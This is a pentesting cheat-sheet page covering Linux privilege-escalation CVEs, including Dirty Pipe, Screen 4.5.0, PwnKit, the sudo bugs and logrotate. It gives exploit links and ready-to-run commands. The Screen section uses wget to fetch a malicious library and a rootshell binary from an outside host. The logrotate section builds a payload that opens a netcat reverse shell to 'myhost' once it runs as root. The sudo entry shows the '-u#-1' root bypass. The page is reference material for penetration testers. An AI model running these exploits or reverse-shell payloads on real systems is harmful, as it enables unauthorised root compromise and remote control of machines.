> For the complete documentation index, see [llms.txt](https://ivalexev.gitbook.io/rednote/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ivalexev.gitbook.io/rednote/pentesting-process/cve/linux.md).

# Linux

## Index

<table><thead><tr><th width="265">Name</th><th>CVE</th><th>Exploit</th></tr></thead><tbody><tr><td><a href="#dirty-pipe">Dirty Pipe</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-0847">CVE-2022-0847</a></td><td><a href="https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits">Exploit</a></td></tr><tr><td><a href="#screen-4.5.0">Screen 4.5.0</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-5618">CVE-2017-5618</a></td><td><a href="https://www.exploit-db.com/exploits/41154">Exploit</a></td></tr><tr><td><a href="#sudo-chroot">Sudo - Chroot</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-32463">CVE‑2025‑32463</a></td><td><a href="https://github.com/pr0v3rbs/CVE-2025-32463_chwoot">Exploit</a></td></tr><tr><td><a href="#sudo-baron-samedit">Sudo - Baron Samedit</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-3156">CVE-2021-3156</a></td><td><a href="https://github.com/blasty/CVE-2021-3156">Exploit</a></td></tr><tr><td><a href="#sudo-runas-all">Sudo - Runas ALL</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-14287">CVE-2019-14287</a></td><td><a href="https://www.sudo.ws/security/advisories/minus_1_uid/">Exploit</a></td></tr><tr><td><a href="#pwnkit-polkit">PwnKit -Polkit</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-4034">CVE-2021-4034</a></td><td><a href="https://github.com/arthepsy/CVE-2021-4034">Exploit</a></td></tr><tr><td><a href="#logrotate">Logrotate</a></td><td>/</td><td><a href="https://github.com/whotwagner/logrotten">Exploit</a></td></tr></tbody></table>

### Dirty Pipe

[Exploit](https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits) kernel from 5.8 to 5.17

{% code overflow="wrap" %}

```bash
sudo apt-get install gcc
chmod +x compile.sh
./compile.sh
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
./exploit-1
# change the root password in the /etc/passwd file and get an elevated shell.
```

{% endcode %}

### Screen 4.5.0

[Exploit](https://www.exploit-db.com/exploits/41154)

{% code overflow="wrap" %}

```bash
chmod +x 41154.sh
./41154.sh
```

{% endcode %}

If you cannot compile on the machine

```bash
wget http://<IP>/libhax.so
wget http://<IP>/rootshell

chmod +x /tmp/rootshell
cd /etc/
umask 000
screen-4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen-4.5.0 -ls
/tmp/rootshell
```

### Sudo - Baron Samedit

[Exploit](https://github.com/blasty/CVE-2021-3156) sudo 1.8.21 | 1.8.31 | 1.8.27 | 1.9.2 | other

Other [Exploit](https://github.com/ashok5141/OSCP/blob/main/Linux/exploit_nss.py)

### Sudo - Chroot

[Exploit](https://github.com/blasty/CVE-2021-3156) sudo 1.9.14 up to 1.9.17

### Sudo - Runas ALL

[Exploit](https://www.sudo.ws/security/advisories/minus_1_uid/) sudo < 1.8.28

Exploiting the bug requires that the user have sudo privileges that allow them to run commands with an arbitrary user ID. Typically, this means that the user’s sudoers entry has the special value `ALL` in the Runas specifier.

ex. `alice myhost = (ALL) /usr/bin/id`

If a sudoers entry is written to allow the user to run a command as any user except root, the bug can be used to avoid this restriction.

ex. `bob myhost = (ALL, !root) /usr/bin/vi`

{% code overflow="wrap" %}

```bash
sudo -u#-1 vi
sudo -u#4294967295 vi
```

{% endcode %}

### PwnKit - Polkit

[Exploit1](https://github.com/arthepsy/CVE-2021-4034) / [Exploit2](https://github.com/ly4k/PwnKit) Polkit < 0.105-26

{% code overflow="wrap" %}

```bash
pkexec --version
```

{% endcode %}

```bash
gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc
```

### Logrotate

[Exploit](https://github.com/whotwagner/logrotten) Logrotate 3.8.6 | 3.11.0 | 3.15.0 | 3.18.0

You have to find log files on which logrotate is run and on which you have write permissions. Then run exploit on the writable log file.

{% code overflow="wrap" %}

```bash
gcc -o logrotten logrotten.c
```

{% endcode %}

Prepare payload

{% code overflow="wrap" %}

```bash
echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi" > payloadfile
```

{% endcode %}

If `"create"-option` is set in logrotate.cfg:

{% code overflow="wrap" %}

```bash
./logrotten -p ./payloadfile /tmp/log/pwnme.log
```

{% endcode %}

If `"compress"-option` is set in logrotate.cfg:

{% code overflow="wrap" %}

```bash
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log
```

{% endcode %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ivalexev.gitbook.io/rednote/pentesting-process/cve/linux.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.